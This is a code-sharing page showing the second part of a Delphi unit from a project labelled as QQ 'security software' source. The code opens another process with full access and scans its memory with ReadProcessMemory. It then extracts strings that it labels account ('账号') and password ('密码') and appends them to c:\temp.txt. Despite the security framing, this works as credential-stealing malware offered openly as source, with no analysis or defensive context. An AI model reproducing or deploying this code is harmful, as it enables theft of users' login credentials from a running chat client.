📄 gpkernel.~pas

📁 DEILPHI写的QQ安全软件源码!功能全套,该有的全有了,欢迎交流
💻 ~PAS
📖 第 1 页 / 共 2 页
字号:
上一页 12
     Newmemoryregions[j].MemorySize:=Memoryregions[i].MemorySize;
     inc(j);
    end;

  inc(i);
  end;
//////////////////////////////////////////////
  MemoryRegionsIndex:=j; //  MemoryRegions[MemoryRegionsIndex]is invalid
  for i:=0 to MemoryRegionsIndex-1 do
  begin
  Memoryregions[i].BaseAddress:=Newmemoryregions[i].BaseAddress;
  Memoryregions[i].MemorySize:=NewMemoryregions[i].MemorySize;
  end;
///////////////////////////////////////////////////////////////////////////////

 for i:=0 to MemoryRegionsIndex-1 do
TotalProcess:=TotalProcess+MemoryRegions[i].MemorySize;
NowProcess:=0;
     
end;////end with
end;

//////////////////初次扫描////////////////////////////////
procedure TFirstScanThread(theIndex:integer);
//Procedure TFirstScanThread.Execute;
var
    ReadMemory_ArrayInt64: Array[0..$1FFF] of Int64;
    ReadMemory_ArrayStringByte:Array[0..$FF] of Byte;
    AdvancedReadMemory_ArrayByte:Array[0..$FFFF] of Byte;
    AdvancedReadFile_ArrayByte:Array[0..$FFFF] of Byte;
    
var TempLength: DWORD;               ////每个内存块的大小字节
    TempSize:DWORD;                 ////缓存区array num的数目
    ActualRead:Dword;
    PhelpSingleDword:^Dword;
    helpsingleDWord1:DWord;  //存放原数的符号位与指数位


    PhelpDoubleint64:^int64;
    helpDoubleint641:int64;  //存放原数的符号位与指数位
    HelpDoubleint642:int64;

    HelpStringLength:Byte;
    chartoFind:integer;

    Time1:Dword;
    Time2:Dword;

    i: integer;
    j: integer;
    k: integer;


    Int64Value: Int64;

    tempAddress:Dword;
    actualwrite:Dword;
    MemoryFileStream:TFileStream;  ///低阶内存svae to memroyFilename
begin
     TheTaskIndex:=theIndex;
with theTask[theTaskIndex] do
begin
GetMemoryRanges(theTaskIndex);
if MemoryRegionsIndex=0 then
begin
//Raise Exception.Create(String_Nomemory);
Exit;
end;

/////////////再次并得到最终数据/////////////////////////////////////////
if (scanType=Number_Scan) then
begin

    if vartype=Int64_value then
    begin
      val(scanvalue,Int64value,i);
  //    if i>0 then raise Exception.Create(Format(String_InvalidInt64,[scanvalue]));
    end;
    if vartype=String_value then
    begin
  //  if Length(scanvalue)>255 then raise Exception.create(Format(String_InvalidString,[scanvalue]));
    end;

end;//if end;
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
   InSearchProcess:=True;
   Searchtimes:=1;
   NowProcess:=0;
   AttachedNum:=0;
   OldScanType:=ScanType;
   OldVarType:=VarType;
   AddressMemStream.Seek(0,soFromBeginning);
/////////Lets Real Start !真正开始!!!!!!!!!!!!!!!!!!!!!!!!!!!!!//////////
////////////////////////////////////////////////////////////

if ScanType=Number_Scan then
begin
Time1:=GetTickCount;

   if vartype=Int64_value then //int64
   begin
      Time1:=GetTickCount;
      for i:=0 to MemoryRegionsIndex-1 do
      begin
        for k:=0 to 7 do                               //k表示错位组合成类型
        begin
        TempLength:=(MemoryRegions[i].MemorySize-k);
        TempSize:=TempLength shr 3;
        if not ReadProcessMemory(processhandle,pointer(MemoryRegions[i].BaseAddress+k),@ReadMemory_Arrayint64,TempLength,actualread) then continue;
          if actualread>0 then
           begin
           TempSize:=actualread shr 3;
            for j:=0 to TempSize-1 do
              begin
               if Readmemory_Arrayint64[j]=int64value then
               begin
               inc(AttachedNum);
               tempAddress:=(MemoryRegions[i].BaseAddress+k)+j*8;
               AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
               end;
              end;

           end;
        end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
      end;
    end;  //int64 end

    NowProcess:=totalProcess;
 //   time2:=getTickCount;
    CanUpdateTask:=IDOK;

   end; //Number_Scan end

//text String scan
if scantype=string_scan then
  begin
    time1:=getTickCount;
    helpStringLength:=length(scanvalue);
    for i:=0 to memoryregionsindex-1 do
    begin
      TempLength:=memoryregions[i].MemorySize;
      TempSize:=TempLength;
      if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@ReadMemory_ArrayStringByte,Memoryregions[i].MemorySize,actualread) then continue;
      if actualread>helpStringLength then
      begin
        CharToFind:=1;
        TempSize:=actualread;
        for j:=0 to TempSize-1 do
        begin
          if chr(ReadMemory_ArrayStringByte[j])=scanvalue[CharToFind] then
          begin
            inc(charToFind);
            if CharToFind>=Dword(helpStringLength)+1 then //found the string
            begin
            inc(AttachedNum);
            tempAddress:=(MemoryRegions[i].BaseAddress)+j-(helpStringLength-1);
            AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
            CharToFind:=1;
            end;
          end else CharToFind:=1;
        end;
      end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
    end;
    NowProcess:=totalProcess;
  //  time2:=getTickCount;
      CanUpdateTask:=IDOK;
end;

///低阶扫描初始化(存放的是地址范围，以后存放具体地址)////////////
//if (scantype<>Number_scan) and (scantype<>String_scan) then
if (VarType=LowLevel_Value) then
begin
   try
 //  MemoryFileStream:=TFileStream.Create(MemoryFileName,fmCreate or FmShareDenyNone);
   MemoryFileStream.Seek(0,soFrombeginning);
    for i:=0 to memoryregionsindex-1 do
    begin
      TempLength:=MemoryRegions[i].MemorySize;
      TempSize:=TempLength;
      if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@AdvancedReadMemory_ArrayByte,TempLength,actualread) then continue;
      if actualread>0 then
      begin
      ActualWrite:=MemoryFileStream.Write(AdvancedReadMemory_ArrayByte,actualread);
      Memoryregions[i].MemorySize:=ActualWrite;
      AdvancedAddressMemStream.WriteBuffer(Memoryregions[i],Sizeof(Memoryregions[i]));
      end;
        inc(NowProcess,MemoryRegions[i].MemorySize);
    end;
      NowProcess:=totalProcess;
      CanUpdateTask:=IDOK;

    finally
    SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF);  //清理内存
    end;
end;

InSearchProcess:=False;
closehandle(ProcessHandle);
end;//with scan end;

end;
//////////////////////////////////////////////////////////////////////////////////////////
//////读取某一进程256字节的指定内容///////////////////////////////////////////////////////
Function ReadMemory_Array(theProcessID,StartAddress:DWORD):boolean;
var k:integer;
    thehandle:Thandle;
    ReadByte:Byte;
    ActualRead:Dword;
begin
Result:=True;
thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin

for k:=1 to 256 do
begin
MemReadData[k]:=-999; /// mean error
ActualRead:=0;
  if ReadProcessMemory(theHandle,Pointer((StartAddress+k-1)),Addr(ReadByte),1,Actualread)then
  begin
    if  (Actualread=1) then  MemReadData[k]:=ReadByte;
  end ;
end;

end else Result:=False;
Closehandle(thehandle);
end;
/////////////////////////////////////////////////////
Function ReadMemory(theProcessID,StartAddress:Dword;ValueAddressPointer:Pointer;ValueType:Integer):boolean;
var thehandle:Thandle;
    ActualRead:Dword;
    ValueLen:integer;
begin
Result:=True;
case ValueType of
Int64_value:ValueLen:=8;
String_Value:ValueLen:=50;
else ValueLen:=1;
end;   ///case end;

thehandle:=OpenProcess(PROCESS_ALL_ACCESS,False,theProcessID);
if thehandle<>0 then
begin
Result:=ReadProcessMemory(theHandle,Pointer(StartAddress),ValueAddressPointer,ValueLen,Actualread);
//if Actualread<>ValueLen then MemReadByte:=0; /// mean error
end else Result:=False;
Closehandle(thehandle);

end;


////////将搜索到的数值加入列表(USER)////////////////////
Procedure AddFoundToListView(theIndex:integer);
var BufSize:Int64;
    AddressBuf:Dword;
    i,j:Integer;
    TempStringBYTE:Array[1..50] of BYTE;
    Tempstring:string;
    F:TEXTFILE;

    begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); ////低阶搜索BufSize=0;
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2;
if BufSize>5 then BufSize:=5;  ///只显示前面3个值
  For i:=1 to BufSize do
  begin
    try
   AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
   GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE,String_value);
   Tempstring:='';
   for  j:=41 to 50 do
     Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE[j]));
   //   TrimRight(Tempstring);
      ZFPDA:=IsNumeric(Tempstring);
      if ZFPDA=True then
      Use:=Tempstring;
   except
    Continue;   //float ofent make error
   end;
  end;//for end
   end;
end;///with end
    begin
     assignfile(F,'c:\temp.txt');
      Append(F);
      try
          writeln(F,'账号',Use);
      finally
          closefile(F);
     end;
    end;
end;

 ////////将搜索到的数值加入列表(PASS)////////////////////
Procedure AddFoundToListViewM(theIndex:integer);
var BufSize:Int64;
    AddressBuf:Dword;
    i,j:Integer;
    TempStringBYTE1:Array[1..50] of BYTE;
    Tempstring:string;
    F:TEXTFILE;

begin

with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); ////低阶搜索BufSize=0;
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2;
if BufSize>13 then BufSize:=13;  ///只显示前面3个值
  For i:=1 to BufSize do
  begin
    try
  AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
  GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE1,String_value);
   Tempstring:='';
   for  j:=19 to 40 do
     Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE1[j]));
      ZFPD:=IsValidIdent(Tempstring);
      if ZFPD=True then
      Pass:=Tempstring;
   except
    Continue;   //float ofent make error
   end;
  end;//for end

end; //if end
   end;

    begin
     assignfile(F,'c:\temp.txt');
      Append(F);
      try
          writeln(F,'密码',Pass);
      finally
          closefile(F);
     end;
    end;
// SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF);  //清理内存
end;///with end

//账号搜索//
procedure ScanWindows(theIndex:integer);
 begin
  //StopHookKeyMouse;
     with theTask[CurrenttaskIndex] do
     begin
  ScanType:=GetScanTypeAndTempVar(TextName,CurrentTaskIndex);
  theTask[CurrentTaskIndex].VarType:=7;
if SearchTimes=0 then
begin
//TFirstScanThread.Create(CurrentTaskIndex);
 TFirstScanThread(CurrentTaskIndex);
 end;
 end;///with end;
    AddFoundToListView(CurrentTaskIndex);
    CanUpdateTask:=-999;
 end;

//密码搜索//
procedure ScanWindowsM(theIndex:integer);
 begin
     with theTask[CurrenttaskIndex] do
     begin
  ScanType:=GetScanTypeAndTempVar(TextNameM,CurrentTaskIndex);
  theTask[CurrentTaskIndex].VarType:=4;
if SearchTimes=0 then
begin
TFirstScanThread(CurrentTaskIndex);
 end;
 end;///with end;
 AddFoundToListViewM(CurrentTaskIndex);
   CanUpdateTask:=-999;
 end;

end.
上一页 12
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -